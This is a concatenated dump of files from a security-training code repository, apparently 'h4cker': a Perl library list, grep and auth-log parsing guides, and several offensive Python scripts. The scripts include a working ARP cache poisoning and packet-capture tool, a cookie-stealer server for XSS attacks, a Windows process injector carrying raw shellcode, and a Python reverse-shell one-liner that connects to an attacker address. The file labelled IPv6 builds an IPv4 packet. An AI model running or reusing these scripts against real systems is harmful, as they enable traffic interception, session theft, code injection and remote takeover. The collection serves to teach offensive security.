[PDL::Stats](https://metacpan.org/pod/PDL::Stats) * [Physics::*](https://metacpan.org/search?q=physics%3A%3A&size=20) ## Stream Manipulation *Libraries for manipulating event streams* * [RxPerl](https://metacpan.org/pod/RxPerl) - Perl implementation of [Reactive Extensions](http://reactivex.io) / rxjs ## REST Frameworks *Libraries for developing REST applications* * [Catalyst::Action::REST](https://metacpan.org/pod/Catalyst::Action::REST) - Automated REST Method Dispatching * [Dancer2::Plugin::REST](https://metacpan.org/pod/Dancer2::Plugin::REST) - A plugin for writing RESTful apps with Dancer2 * [Dancer::Plugin::REST](https://metacpan.org/pod/Dancer::Plugin::REST) - A plugin for writing RESTful apps with Dancer * [Raisin](https://metacpan.org/pod/Raisin) - a REST API micro framework for Perl * [Squatting](https://metacpan.org/pod/Squatting) - A Camping-inspired Web Microframework for Perl ## Template Engines *Libraries and tools for templating* * [HTML::Template](https://metacpan.org/pod/HTML::Template) - Templates for web pages * [Template::Alloy](https://metacpan.org/pod/Template::Alloy) - TT2/3, HT, HTE, Tmpl, and Velocity Engine * [Template::Toolkit](https://metacpan.org/pod/Template::Toolkit) - Very Popular Template Processing System * [Text::MicroTemplate](https://metacpan.org/pod/Text::MicroTemplate) - Fast, simple and safe template engine written in pure-Perl and core modules. * [Text::MicroTemplate::Extended](https://metacpan.org/pod/Text::MicroTemplate::Extended) - Extended Text::MicroTemplate. * [Text::Template](https://metacpan.org/pod/Text::Template) - Templates with embedded perl * [Text::Xslate](https://metacpan.org/pod/Text::Xslate) - Faster template engine with XS. Supports multiple syntaxes. * [Tiffany](https://metacpan.org/pod/Tiffany) - Generic interface for template engines. It makes it easy to use multiple template engines. * [Template::Magic](https://metacpan.org/pod/Template::Magic) - Magic merger of runtime values with templates. ## Testing *Libraries for testing codebases and generating test data.* ### Testing Frameworks * [Test::Base](https://metacpan.org/pod/Test::Base) - A Data Driven Testing Framework * [Test::Base::Less](https://metacpan.org/pod/Test::Base::Less) - Limited version of Test::Base * [Test::BDD::Cucumber](https://metacpan.org/pod/Test::BDD::Cucumber) - Implementation of the popular Cucumber framework in Perl * [Test::Class](https://metacpan.org/pod/Test::Class) - Class-based testing. Support "setup" and "teardown". * [Test::Deep](https://metacpan.org/pod/Test::Deep) - Test deep and complex data structures with great flexibility. * [Test::Deep::Matcher](https://metacpan.org/pod/Test::Deep::Matcher) * [Test::Harness](https://metacpan.org/pod/Test::Harness) - Run Perl standard test scripts with statistics * [Test::Kantan](https://metacpan.org/pod/Test::Kantan) - simple, flexible, fun "Testing framework" * [Test::More](https://metacpan.org/pod/Test::More) ### Test Double * [Test::Exception](https://metacpan.org/pod/Test::Exception) * [Test::Fatal](https://metacpan.org/pod/Test::Fatal) - Simple module for verifying exceptions. * [Test::Mock::Guard](https://metacpan.org/pod/Test::Mock::Guard) - Mocking package subroutines. * [Test::MockTime](https://metacpan.org/pod/Test::MockTime) * [Test::mysqld](https://metacpan.org/pod/Test::mysqld) * [Test::TCP](https://metacpan.org/pod/Test::TCP) - Launch temporary TCP Server * [Test::Time](https://metacpan.org/pod/Test::Time) - Simple module for faking system time. ### Coverage * [Devel::Cover](https://metacpan.org/pod/Devel::Cover) * [Devel::Cover::Report::Coveralls](https://metacpan.org/pod/Devel::Cover::Report::Coveralls) Report to Coveralls ## Tools *Some useful tools* * [App::Ack](https://metacpan.org/pod/App::Ack) - ack is a tool like grep, optimized for programmers. * [App::Nopaste](https://metacpan.org/pod/App::Nopaste) - Post to various pastebins from the CLI * [Daiku](https://metacpan.org/pod/Daiku) - Make for Perl. * [Data::Printer](https://metacpan.org/pod/Data::Printer) - Colored pretty-print of Perl data structures and objects. * [Reply](https://metacpan.org/pod/Reply) - Read-eval-print-loop(REPL) command-line tool. * [Riji](https://metacpan.org/pod/Riji) - Static site generator using markdown and git mainly for blogging. * [Smart::Comments](https://metacpan.org/pod/Smart::Comments) - Comments that do more than just sit there. *Libraries for developping command line applications* * [Toolbox::Simple](https://metacpan.org/pod/Toolbox::Simple) - Simplfy some common tasks in Perl. * [Script::Toolbox](https://metacpan.org/pod/Script::Toolbox) - Framework for the daily business scripts. * [Devel::Kit](https://metacpan.org/pod/Devel::Kit)- Handy toolbox of things to ease development/debugging. *Libraries for handling configuration files* * [Config::Tiny](https://metacpan.org/pod/Config::Tiny) - Read/Write .ini style files with as little code as possible ## Type checking * [MooseX::Types](https://metacpan.org/pod/MooseX::Types) - Moose types management tool * [Type::Tiny](https://metacpan.org/pod/Type::Tiny) - Tiny, yet comprehensive type library ## Video * [FFmpeg](https://metacpan.org/pod/FFmpeg) - Interface to FFmpeg, a video converter written in C * [Video::Info](https://metacpan.org/pod/Video::Info) - Retrieve video properties such as: height width codec fps * [Vlc::Engine](https://metacpan.org/pod/Vlc::Engine) - use Vlc media player with Perl * [VideoLAN::LibVLC](https://metacpan.org/pod/VideoLAN::LibVLC) - Perl bindings for libvlc.so * [Video::Generator](https://metacpan.org/pod/Video::Generator) - Perl class for video generation ## Web Frameworks *Libraries for developing Web applications* * [Amon2](https://metacpan.org/pod/Amon2) * [Catalyst](https://metacpan.org/pod/Catalyst) - Overflowing with features. Very popular. * [Dancer](https://metacpan.org/pod/Dancer) ([Official site](http://perldancer.org/)) * [Dancer2](https://metacpan.org/pod/Dancer2) * [Gantry](https://metacpan.org/pod/Gantry) - Web application framework for mod\_perl, cgi, etc. * [Kelp](https://metacpan.org/pod/Kelp) - Plack-focused Perl web framework * [Kossy](https://metacpan.org/pod/Kossy) - A Web framework with simple interface. * [Mojolicious](https://metacpan.org/pod/Mojolicious) - An all in one framework. * [Poet](https://metacpan.org/pod/Poet) - a modern Perl web framework for Mason developers ### Middlewares *Libraries for creating HTTP middlewares* * [Gazelle](https://metacpan.org/pod/Gazelle) - Preforked Plack Handler for performance freaks * [Plack](https://metacpan.org/pod/Plack) - PSGI server implementation and utilities for Web applications. * [Server::Starter](https://metacpan.org/pod/Server::Starter) - Process manager with the "graceful restart" feature. * [Starlet](https://metacpan.org/pod/Starlet) - High-performance PSGI Server * [Starman](https://metacpan.org/pod/Starman) - High-performance preforking PSGI/Plack web server * [Twiggy](https://metacpan.org/pod/Twiggy) - Event-driven PSGI application server ## Web Frameworks-Like *Somewhere between templates and full on frameworks* * [Embperl](https://metacpan.org/pod/Embperl) - Building dynamic Websites with Perl (sort of like Perl crossed with PHP) * [Mason](https://metacpan.org/pod/Mason) - Powerful, high-performance templating for the web and beyond ## Web Scraping *Libraries for extracting some information from websites* * [Web::Scraper](https://metacpan.org/pod/Web::Scraper) * [WWW::Mechanize](https://metacpan.org/pod/WWW::Mechanize) * [WWW::Mechanize::PhantomJS](https://metacpan.org/pod/WWW::Mechanize::PhantomJS) - automate the PhantomJS browser * [WWW::Scripter](https://metacpan.org/pod/distribution/WWW-Scripter/lib/WWW/Scripter.pod) - For scripting web sites that have scripts * [WWW::Selenium](https://metacpan.org/pod/WWW::Selenium) ## Network Security *Some great libraries for starting the world of Network security with Perl* * [Net::Pcap](https://metacpan.org/pod/Net::Pcap) - Interface to the pcap LBL packet capture library * [Net::Ncap](https://metacpan.org/pod/Net::Ncap) - Perl binding to the ncap network data capture library * [Net::Frame](https://metacpan.org/pod/Net::Frame) - Perl framework for frame crafting * [NetPacket](https://metacpan.org/pod/NetPacket) - assemble/disassemble network packets at the protocol level * [Net::Write](https://metacpan.org/pod/Net::Write) - portable interface to open and send raw data to network * [Net::Analysis](https://metacpan.org/pod/Net::Analysis) - Perl library for analysing network traffic * [Net::Silk](https://metacpan.org/pod/Net::Silk) - Perl's Interface to the SiLK network flow library * [Net::Inspect](https://metacpan.org/pod/Net::Inspect) - Perl library for inspection of data on various network layers * [Net::Tshark](https://metacpan.org/pod/Net::Tshark) - Perl interface for Tshark network capture utility * [Net::Sharktools](https://metacpan.org/pod/Net::Sharktools) - Wireshark's packet inspection capabilities in Perl * [File::PCAP](https://metacpan.org/pod/File::PCAP) - Read, Write and manipulate PCAP file format through Perl * [Net::P0f](https://metacpan.org/pod/Net::P0f) - Perl interface to p0f utility, usefull for finger-printing os * [Net::Pcap::Reassemble](https://metacpan.org/pod/Net::Pcap::Reassemble) - Perl IP fragment reassembly for Net::Pcap * [Nagios::NRPE](https://metacpan.org/pod/Nagios::NRPE) - Pure perl Nagios NRPE implementation * [Monitoring::Plugin](https://metacpan.org/pod/Monitoring::Plugin) - A family of perl modules to streamline writing Naemon, Nagios, Icinga or Shinken (and compatible) plugins * [Net::Connection::Sniffer](https://metacpan.org/pod/Net::Connection::Sniffer) - practical Perl library for MiTM connections * [Net::ARP](https://metacpan.org/pod/Net::ARP) - Library for crafting ARP packets * [SNMPMonitor](https://metacpan.org/pod/SNMPMonitor) - Perl extension for writing SNMP Monitors * [Net::LibNIDS](https://metacpan.org/pod/Net::LibNIDS) - Perl interface for the Network Intrusion Detection System library * [Parse::Snort](https://metacpan.org/pod/Parse::Snort) - Perl Snort rules parser * [Net::Wireless::802_11::WPA::CLI](https://metacpan.org/pod/Net::Wireless::802_11::WPA::CLI) - Perl WPA_CLI interface * [IO::Socket::SSL::Intercept](https://metacpan.org/IO::Socket::SSL::Intercept) - library for intercepting SSL connections through Perl ## Metadata Forensics *General Metadata files parser, usefull during forensics investigations* * [Image::ExifTool](https://metacpan.org/pod/distribution/Image-ExifTool/exiftool) - General metadata parser and viewer framework ## Reverse Engineering *Libraries used for disassembly assembly operations, ELF files and bytecode* * [Disassembly](https://metacpan.org/pod/distribution/B-C/script/disassemble) - Decompiles binary bytecode to readable and recompilable bytecode assembler * [Python::Bytecode](https://metacpan.org/pod/Python::Bytecode) - Parse Python bytecode * [B::Bytecode](https://metacpan.org/pod/B::Bytecode) - Compiles a Perl script into a bytecode format that could be loaded later * [Perf::ARM](https://metacpan.org/pod/Perf::ARM) - Use ARM instructions in Perl * [Asm::Z80::Table](https://metacpan.org/pod/Asm::Z80::Table) - assemble / disassemble all Z80 CPU assembly instructions with Perl * [X86::Disasm](https://metacpan.org/pod/X86::Disasm) - Disassemble Intel x86 instructions with Perl * [Disassemble::X86](https://metacpan.org/pod/Disassemble::X86) - Another library for disassembe X86 instructions * [X86::Udis86](https://metacpan.org/pod/X86::Udis86) - Interface for the C Udis disassembler * [Asm::X86](https://metacpan.org/pod/Asm::X86) - List of instructions and registers of x86-compatible processors, validating and converting instructions and memory references * [ELF::Writer](https://metacpan.org/pod/ELF::Writer) - write and read executable ELF files
Markdown
h4cker/programming_and_scripting_for_cybersecurity/text_manipulation.md
# Tips for Text Manipulation ## grep Commands Cheatsheets - [Ryan's Tutorials Cheat Sheet](https://ryanstutorials.net/linuxtutorial/cheatsheetgrep.php) - [DevNotes cheatsheet](https://dev-notes.eu/2016/10/grep-commands-cheatsheet) ## Regex - [grep + regex cheatsheet](https://staff.washington.edu/weller/grep.html) - [nixCraft Tutorial](https://www.cyberciti.biz/faq/grep-regular-expressions/) ## Converters - [BigBash](https://github.com/zalando/bigbash) - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/arp_cache_poisoner.py
#!/usr/bin/env python3 # ARP Cache Poisoning Attack using SCAPY # Version: 0.3 # Author: Omar Santos @santosomar # This script performs an ARP cache poisoning attack using the SCAPY library. # It spoofs ARP replies to the target and gateway, causing them to update their ARP tables with the attacker's MAC address. # The attacker then forwards packets between the target and gateway, allowing for eavesdropping or manipulation. from scapy.all import * import os import signal import sys import threading import time # Network and interface parameters gateway_ip = "192.168.78.1" target_ip = "192.168.78.123" packet_count = 1000 conf.iface = "en0" conf.verb = 0 # Get the MAC address of the given IP address. def get_mac(ip_address): """ Retrieves the MAC address corresponding to the given IP address using ARP. :param ip_address: IP address for which to retrieve the MAC address. :return: MAC address if found, None otherwise. """ resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10) for s, r in resp: return r[ARP].hwsrc return None # Restore the network by reversing the ARP poison attack. def restore_network(gateway_ip, gateway_mac, target_ip, target_mac): """ Restores the network by sending ARP packets to correct the IP-MAC mappings. :param gateway_ip: IP address of the gateway. :param gateway_mac: MAC address of the gateway. :param target_ip: IP address of the target device. :param target_mac: MAC address of the target device. """ send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5) send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5) print("[*] Disabling IP forwarding") os.system("sysctl -w net.inet.ip.forwarding=0") os.kill(os.getpid(), signal.SIGTERM) # Perform the ARP poisoning attack. def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac): """ Performs the ARP poisoning attack by sending crafted ARP packets. :param gateway_ip: IP address of the gateway. :param gateway_mac: MAC address of the gateway. :param target_ip: IP address of the target device. :param target_mac: MAC address of the target device. """ print("[*] Started ARP poison attack [CTRL-C to stop]") try: while True: send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip)) send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip)) time.sleep(2) except KeyboardInterrupt: print("[*] Stopped ARP poison attack. Restoring network") restore_network(gateway_ip, gateway_mac, target_ip, target_mac) # Main script execution print("[*] Starting arp_cache_poisoner") print("[*] Enabling IP forwarding") os.system("sysctl -w net.inet.ip.forwarding=1") print(f"[*] Gateway IP address: {gateway_ip}") print(f"[*] Target IP address: {target_ip}") gateway_mac = get_mac(gateway_ip) if gateway_mac is None: print("[!] Unable to get gateway MAC address. Exiting..") sys.exit(0) else: print(f"[*] Gateway MAC address: {gateway_mac}") target_mac = get_mac(target_ip) if target_mac is None: print("[!] Unable to get target MAC address. Exiting..") sys.exit(0) else: print(f"[*] Target MAC address: {target_mac}") # Start the ARP poison thread poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac)) poison_thread.start() # Collect packet captures and save them to a file try: sniff_filter = "ip host " + target_ip print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}") packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count) # Save captured packets to a .pcap file wrpcap(target_ip + "_capture.pcap", packets) print(f"[*] Stopping network capture..Restoring network") restore_network(gateway_ip, gateway_mac, target_ip, target_mac) # Gracefully handle KeyboardInterrupt (Ctrl+C) to stop packet capture and restore the network except KeyboardInterrupt: print(f"[*] Stopping network capture..Restoring network") restore_network(gateway_ip, gateway_mac, target_ip, target_mac) sys.exit(0)
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/arp_cache_poisoner_simple.py
from scapy.all import * # Author: Omar Santos # Perform ARP cache poisoning def perform_arpcache_poisoning(victim_ip, gateway_ip): """ Performs ARP cache poisoning by sending a crafted ARP packet to associate the gateway IP-MAC mapping with the victim IP. :param victim_ip: IP address of the victim device whose ARP cache will be poisoned. :param gateway_ip: IP address of the legitimate gateway device whose IP-MAC mapping will be spoofed. """ # Construct the ARP packet packet = ARP(op=2, pdst=victim_ip, hwdst=getmacbyip(victim_ip), psrc=gateway_ip) # Send the ARP packet send(packet, verbose=0) # Specify the victim IP and gateway IP victim_ip = "192.168.1.100" gateway_ip = "192.168.1.1" # Perform ARP cache poisoning perform_arpcache_poisoning(victim_ip, gateway_ip)
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/basic_ipv4_scapy_packet.py
from scapy.all import * # create the packet packet = IP(src="10.1.1.2", dst="10.3.2.88")/TCP(dport=445) # send the packet send(packet) # You can also use sr() function for sending and receiving packet at the same time. # ans, unans = sr(packet, timeout=2)
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/basic_ipv6_scapy_packet.py
from scapy.all import * # create the packet packet = IP(src="10.1.1.2", dst="10.3.2.88")/TCP(dport=445) # send the packet send(packet) # You can also use sr() function for sending and receiving packet at the same time. # ans, unans = sr(packet, timeout=2)
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/cookie_stealer.py
#!/usr/bin/env python3 # This is a fairly basic Flask app / script to steal cookies # It can be used as a cookie-stealer for XSS and CSRF attacks # This is available by default in WebSploit Labs (websploit.org) # Make sure that you have flask, requests, and redirect installed # pip3 install flask, requests, redirect from flask import Flask, request, redirect from datetime import datetime # Creating the instance for the Flask app app = Flask(__name__) #The following is the root directory of our web app @app.route('/') #Let's now create a function to steal the cookie and write it to a file "cookies.txt" def cookie(): cookie = request.args.get('c') f = open("cookies.txt","a") f.write(str(cookie) + ' ' + str(datetime.now()) + '\n') f.close() # redirecting the user back to the vulnerable application # change the URL to whatever application you are leveraging return redirect("http://10.6.6.22") # you can change the port below to whatever you want to listen it if __name__ == "__main__": app.run(host = '0.0.0.0', port=1337)
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/dll_injection_example.py
#!/usr/bin/env python3 # An example example of reflective DLL injection import sys from ctypes import * from win32com.client import GetObject if len(sys.argv) < 2: print "Python code injector: ./" + sys.argv[0] + " <process to inject>" sys.exit(0) proc = sys.argv[1] WMI = GetObject('winmgmts:') p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(proc)) if len(p) == 0: print "Process " + proc + " not found, exiting!" sys.exit(0) process_id = p[0].Properties_('ProcessId').Value shellcode = \ "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" \ "\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" \ "\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" \ "\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" \ "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" \ "\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" \ "\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" \ "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" \ "\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" \ "\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" \ "\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" \ "\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" \ "\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" \ "\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" \ "\x52\xe8\x5f\xff\xff\xff\x68\x58\x20\x20\x20\x68\x20\x50" \ "\x4f\x43\x68\x63\x74\x6f\x72\x68\x49\x6e\x6a\x65\x68\x6f" \ "\x64\x65\x20\x68\x6f\x6e\x20\x43\x68\x50\x79\x74\x68\x31" \ "\xdb\x88\x5c\x24\x18\x89\xe3\x68\x72\x67\x58\x20\x68\x6e" \ "\x61\x2e\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68" \ "\x2e\x61\x6e\x64\x68\x2f\x77\x77\x77\x68\x70\x73\x3a\x2f" \ "\x68\x20\x68\x74\x74\x68\x72\x67\x20\x2d\x68\x6e\x61\x2e" \ "\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68\x40\x61" \ "\x6e\x64\x68\x64\x72\x65\x61\x68\x2d\x20\x61\x6e\x68\x75" \ "\x6e\x61\x20\x68\x46\x6f\x72\x74\x68\x72\x65\x61\x20\x68" \ "\x20\x41\x6e\x64\x68\x64\x20\x62\x79\x68\x6c\x6f\x70\x65" \ "\x68\x64\x65\x76\x65\x68\x64\x6c\x79\x20\x68\x50\x72\x6f" \ "\x75\x31\xc9\x88\x4c\x24\x5e\x89\xe1\x31\xd2\x52\x53\x51" \ "\x52\xff\xd0\x31\xc0\x50\xff\x55\x08" process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, process_id) if not process_handle: print "Couldn't acquire a handle to PID: %s" % process_id sys.exit(0) memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, len(shellcode), 0x00001000, 0x40) windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), 0) if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0): print "Failed to inject shellcode. Exiting." sys.exit(0) print "Remote thread created!"
Python
h4cker/programming_and_scripting_for_cybersecurity/exploitation/pyshark_example.py
#!/usr/bin/python # Author: Omar Santos @santosomar # version 1.0 # This is a quick demonstration on how to use the python pyshark library # * Pre-requisite: pyshark python library. # * Install it with pip install pyshark # PyShark is a Python wrapper for tshark, # allowing python packet parsing using wireshark dissectors. ##################################################################### import pyshark capture = pyshark.LiveCapture(interface='eth0') for packet in capture.sniff_continuously(packet_count=5): print ('You just captured a packet:', packet)
Markdown
h4cker/programming_and_scripting_for_cybersecurity/exploitation/python_cool_tricks.md
# Cool Python Tricks Please do not use Python 2 and work using Python 3. However, I have added a few examples of the old ways of doing these operations in Python 2 for your reference only. ## Starting a quick web server to serve some files (useful for post exploitation) ### In Python 2.x ``` python -m SimpleHTTPServer 1337 ``` ### In Python 3.x ``` python3 -m http.server 1337 ``` ---- ## Pythonic Web Client ### In Python 2.x ``` python -c 'import urllib2; print urllib2.urlopen("http://h4cker.org/web").read()' | tee /tmp/file.html ``` ### In Python 3.x ``` python3 -c 'import urllib.request; urllib.request.urlretrieve ("http://h4cker.org/web","/tmp/h4cker.html")' ``` ---- ## Python Debugger This imports a Python file and runs the debugger automatically. This is useful for debugging Python-based malware and for post-exploitation. ``` python -m pdb <some_python_file> ``` Refer to this [Python Debugger cheatsheet](https://kapeli.com/cheat_sheets/Python_Debugger.docset/Contents/Resources/Documents/index) if you are not familiar with the Python Debugger. ---- ## Shell to Terminal This is useful after exploitation and getting a shell. It allows you to use Linux commands that require a terminal session (e.g., su, sudo, vi, etc.) ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` ---- ## Using Python to do a Reverse Shell You put your IP address (instead of 192.168.78.205) and the port (instead of 13337) below: ``` python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.78.205",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' ```
Markdown
h4cker/programming_and_scripting_for_cybersecurity/parsing_auth_log/bash_tips.md
## Searching with Grep One of the simplest ways to analyze logs is by performing plain text searches using grep. grep is a command line tool that can search for matching text in a file, or in output from other commands. It’s included by default in most Linux distributions and is also available for Windows and Mac. To perform a simple search, enter your search string followed by the file you want to search. Here, we search the authentication log for lines containing “user hoover”. ``` $ grep "user hoover" /var/log/auth.log pam_unix(sshd:session): session opened for user hoover by (uid=0) pam_unix(sshd:session): session closed for user hoover ``` Note that this returns lines containing the exact match. This makes it useful for searches where you know exactly what you’re looking for. ## Regular Expressions A regular expression (or regex) is a syntax for finding certain text patterns within a file. Regular expressions are much more flexible than plain text searches by letting you use a number of techniques beyond simple string matching. They allow for a high degree of control, but constructing an accurate pattern can be difficult. For example, let’s say we want to find authentication attempts on port 4792. Simply searching “4792” would match the port, but it could also match a timestamp, URL, or other number. In this case, it matched an Apache log that happened to have 4792 in the URL. ``` $ grep "4792" /var/log/auth.log Accepted password for hoover from 10.0.2.2 port 4792 ssh2 74.91.21.46 - - [06/Jun/2019:19:44:32 +0000] "GET /scripts/samples/sear ``` To prevent this, we could use a regex that only returns instances of 4792 preceded by “port” and an empty space. We do this using a technique known as positive lookbehind. Our expression looks like this (the -P flag indicates we’re using the Perl regular expression syntax). ``` $ grep -P "(?<=port\s)4792" /var/log/auth.log Accepted password for hoover from 10.0.2.2 port 4792 ssh2 ``` ## Surround Search Using surround search returns a number of lines before or after a match. This provides context for each event by letting you trace the events that led up to or immediately followed the event. The -B flag specifies how many lines to return before the event, and the -A flag specifies the number of lines after. For example, let’s search for attempted logins with an invalid username and show the surrounding results. We see that users who fail to log in also fail the reverse mapping check. This means the client doesn’t have a valid reverse DNS record, which is common with public Internet connections. This doesn’t mean your SSH server is vulnerable, but it could mean attackers are actively trying to gain access to it. ``` $ grep -B 3 -A 2 'Invalid user' /var/log/auth.log Apr 28 17:06:20 ip-172-31-11-241 sshd[12545]: reverse mapping checking getaddrinfo for 216-19-2-8.commspeed.net [216.19.2.8] failed - POSSIBLE BREAK-IN ATTEMPT! Apr 28 17:06:20 ip-172-31-11-241 sshd[12545]: Received disconnect from 216.19.2.8: 11: Bye Bye [preauth] Apr 28 17:06:20 ip-172-31-11-241 sshd[12547]: Invalid user admin from 216.19.2.8 Apr 28 17:06:20 ip-172-31-11-241 sshd[12547]: input_userauth_request: invalid user admin [preauth] Apr 28 17:06:20 ip-172-31-11-241 sshd[12547]: Received disconnect from 216.19.2.8: 11: Bye Bye [preauth] ``` ## Tail Tail is another command line tool that can display the latest changes from a file in real time. This is useful for monitoring ongoing processes, such as restarting a service or testing a code change. You can also use tail to print the last few lines of a file, or pair it with grep to filter the output from a log file. ``` $ tail -f /var/log/auth.log | grep 'Invalid user' Apr 30 19:49:48 ip-172-31-11-241 sshd[6512]: Invalid user ubnt from 219.140.64.136 Apr 30 19:49:49 ip-172-31-11-241 sshd[6514]: Invalid user admin from 219.140.64.136 ``` A full introduction on grep and regular expressions is outside the scope of this guide, but you can find more resources at the end of this section. [button url="parse"]parse[/button] ## Cut The cut command allows you to parse fields from delimited logs. Delimiters are characters like equal signs or commas that break up fields or key-value pairs. Let’s say we want to parse the user from this log. ``` pam_unix(su:auth): authentication failure; logname=hoover uid=1000 euid=0 tty=/dev/pts/0 ruser=hoover rhost= user=root ``` We can use the cut command like this to get the eighth match. This example is on an Ubuntu system. ``` $ grep "authentication failure" /var/log/auth.log | cut -d '=' -f 8 root ``` ## Filtering and Parsing With Awk Filtering allows you to search on a specific field value instead of doing a full text search. This makes your log analysis more accurate because it will ignore undesired matches from other parts of the log message. In order to search on a field value, you need to parse your logs first, or at least have a way of searching based on the event structure. To do this, we can use awk. Awk is a powerful command line tool that provides a complete scripting language, so you can filter and parse out fields more effectively. For example, let’s say we want to extract the username from all failed login attempts. Our logs have the following format. ``` Mar 24 08:28:18 ip-172-31-11-241 sshd[32701]: input_userauth_request: invalid user guest [preauth] ``` Here’s how you can use the awk command. First, we use the regular expression /sshd.*invalid user/ to match the sshd invalid user lines. Then print the ninth field using the default delimiter (a space character) using { print $9 }. This outputs the usernames. ``` $ awk '/sshd.*invalid user/ { print $9 }' /var/log/auth.log guest ``` ## Filtering on Errors With Awk One of the most common things people want to see in their logs are errors. Unfortunately, the default syslog configuration doesn’t output the severity of errors directly, making it difficult to filter on them. There are two ways you can solve this problem. First, you can modify your rsyslog configuration to output the severity in the log file to make it easier to read and search. In your rsyslog configuration you can add a template with pri-text such as the following. ``` "<%pri-text%> : %timegenerated%,%HOSTNAME%,%syslogtag%,%msg%n" ``` This example gives you output in the following format. You can see that the severity in this message is “err”: ``` <authpriv.err> : Mar 11 18:18:00,hoover-VirtualBox,su[5026]:, pam_authenticate: Authentication failure ``` You can use awk to search for just the error messages. In this example, we’re including some surrounding syntax to match this field specifically. ``` $ awk '/.err>/ {print}' /var/log/auth.log <authpriv.err> : Mar 11 18:18:00,hoover-VirtualBox,su[5026]:, pam_authenticate: Authentication failure ``` While command-line tools are useful for quick searches on small files, they don’t scale well to large files or across multiple systems. Log management systems are much more effective at searching through large volumes of log data quickly. We’ll discuss log management systems in the next section.
Python
h4cker/programming_and_scripting_for_cybersecurity/parsing_auth_log/logalyzer.py
import os import sys from optparse import OptionParser import ParseLogs # # Logalyzer. Original: https://github.com/hatRiot/logalyzer # Converted to python3.6 by @programmerchad # # callback for the user flag def user_call(option, opt_str, value, parser): if len(parser.rargs) != 0: value = parser.rargs[0] else: value = None setattr(parser.values, option.dest, value) if __name__ == "__main__": # default location log = '/var/log/auth.log' # parsing options parser = OptionParser(epilog= "Combine flags to view user-specific information. \'-u test -i\' lists IP addresses " "associated with user test") parser.add_option("-u", help="Specify user. Blank lists all users.", action="callback", callback=user_call, default=None, dest="user") parser.add_option("--full", help="Full log dump for specified user", action="store_true", default=False, dest="fullu") parser.add_option("-l", help="Specify log file. Default is auth.log", default=None, dest="log") parser.add_option("-f", help="List failures", action="store_true", default=False, dest="fail") parser.add_option("-s", help="List success logs", action="store_true", default=False, dest="success") parser.add_option("-c", help="List commands by user", action="store_true", default=False, dest="commands") parser.add_option("-i", help="List IP Addresses", action="store_true", default=False, dest="ip") # get arguments (options, args) = parser.parse_args() # if they're trying to access /var/log/auth.log without proper privs, bail if not os.getuid() == 0 and options.log is None: print("[-] Please run with SUDO") sys.exit(1) # check if they specified another file if options.log is not None: log = options.log # parse logs LOGS = ParseLogs.ParseLogs(log) if LOGS is None: sys.exit(1) # validate the user if options.user: if not options.user in LOGS: print(f"[-] User \'{options.user}\' is not present in the logs.") sys.exit(1) # tag log location first print('[!] Log file: ', log) # output all commands if options.commands and not options.user: for i in LOGS: for comms in LOGS[i].commands: print(f"{i}:\t{comms}") sys.exit(1) # output all failures elif options.fail and not options.user: for i in LOGS: for fail in LOGS[i].fail_logs: print(f"{i}:\t{fail}") sys.exit(1) # output all logged IP addresses elif options.ip and not options.user: for i in LOGS: for ip in LOGS[i].ips: print(f"{i}:\t{ip}") sys.exit(1) # output user-specific commands if options.commands and options.user: print(f"[+] Commands for user \'{options.user}\'") for com in LOGS[options.user].commands: print("\t", com) # output user-specific success logs elif options.success and options.user: print(f"[+] Successes logs for user 